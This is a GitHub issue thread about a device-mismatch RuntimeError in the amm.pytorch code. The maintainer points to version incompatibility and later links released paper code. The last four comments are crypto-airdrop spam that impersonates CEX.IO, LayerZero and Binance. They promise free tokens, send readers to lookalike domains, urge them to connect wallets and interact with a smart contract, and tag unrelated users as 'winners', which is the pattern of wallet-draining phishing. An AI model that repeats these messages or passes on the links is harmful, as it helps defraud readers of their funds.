### ISSUE TITLE
how to fix it    Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu!  

### ISSUE THREAD

**Issue by aspnetcs** [ZiangYan/amm.pytorch#1]
python3 generalization.py --scratch --dataset mnist --arch mlp800 --use-trainval --lmbd 0 --lr 0.005 

Traceback (most recent call last):
  File "generalization.py", line 849, in <module>
    main()
  File "generalization.py", line 746, in main
    train(model)
  File "generalization.py", line 644, in train
    grad_all[selected] = torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad, norm_type=2)
RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu!

**Comment by ZiangYan** [comment]
Hi, which pytorch and torchvision version do you use?

**Comment by aspnetcs** [comment]
Type "help", "copyright", "credits" or "license" for more information.

>>> import torch

>>> torch.__version__

'1.7.1+cu101'

>>> import torchvision

>>> torchvision.__version__

'0.8.2+cu101'

>>> 













--




At 2021-02-27 23:45:50, "yanziang" <notifications@github.com> wrote:

Hi, which pytorch and torchvision version do you use?

**Comment by aspnetcs** [comment]
可以下拉docker
docker push aspnetcs88/dlp:amm.pytorch


运行docker
nvidia-docker run -it aspnetcs88/dlp:amm.pytorch /bin/bash




进入dock而后，
运行
python3 generalization.py --scratch --dataset mnist --arch mlp800 --use-trainval --lmbd 0 --lr 0.005 
便会出现
Traceback (most recent call last):
  File "generalization.py", line 849, in <module>
    main()
  File "generalization.py", line 746, in main
    train(model)
  File "generalization.py", line 644, in train
    grad_all[selected] = torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip_grad, norm_type=2)
RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu!







--




At 2021-02-27 23:45:50, "yanziang" <notifications@github.com> wrote:

Hi, which pytorch and torchvision version do you use?

**Comment by ZiangYan** [comment]
Hi, this codebase is tested on python 3.5 + pytorch 1.1.0 + torchvision 0.2.2, and I'm not sure it can work without modification on the newest pytorch (1.7.1).


> Type "help", "copyright", "credits" or "license" for more information.
> >> import torch >> torch.__version__
> '1.7.1+cu101'
> >> import torchvision >> torchvision.__version__
> '0.8.2+cu101'
> […](#)
> >>
> -- At 2021-02-27 23:45:50, "yanziang" <notifications@github.com> wrote: Hi, which pytorch and torchvision version do you use? — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or unsubscribe.

**Comment by aspnetcs** [comment]
Policy-Driven Attack: Learning to Query for Hard-label Black-box Adversarial Examples




Is the source code of this article open source?







--




At 2021-02-28 12:55:16, "yanziang" <notifications@github.com> wrote:

Hi, this codebase is tested on python 3.5 + pytorch 1.1.0 + torchvision 0.2.2, and I'm not sure it can work without modification on the newest pytorch (1.7.1).

Type "help", "copyright", "credits" or "license" for more information.

import torch >> torch.version
'1.7.1+cu101'
import torchvision >> torchvision.version
'0.8.2+cu101'
…

-- At 2021-02-27 23:45:50, "yanziang" notifications@github.com wrote: Hi, which pytorch and torchvision version do you use? — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or unsubscribe.

**Comment by ZiangYan** [comment]
Not yet.

**Comment by aspnetcs** [comment]
waiting........













--




在 2021-03-05 23:15:38，"yanziang" <notifications@github.com> 写道：

Not yet.

**Comment by ZiangYan** [comment]
> Policy-Driven Attack: Learning to Query for Hard-label Black-box Adversarial Examples Is the source code of this article open source?
> […](#)
> -- At 2021-02-28 12:55:16, "yanziang" <notifications@github.com> wrote: Hi, this codebase is tested on python 3.5 + pytorch 1.1.0 + torchvision 0.2.2, and I'm not sure it can work without modification on the newest pytorch (1.7.1). Type "help", "copyright", "credits" or "license" for more information. import torch >> torch.version '1.7.1+cu101' import torchvision >> torchvision.version '0.8.2+cu101' …
> -- At 2021-02-27 23:45:50, "yanziang" notifications@github.com wrote: Hi, which pytorch and torchvision version do you use? — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or unsubscribe. — You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub, or unsubscribe.

Hi, the source code for our ICLR 2021 paper has been released at https://github.com/ZiangYan/pda.pytorch

**Comment by codelou** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by santhosh-trillionthoughts** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @antonper, @jakeytaber32457, @fajarvm, @damianhakert, @luowei-D, @satyaki-mallick, @terrytangyuan
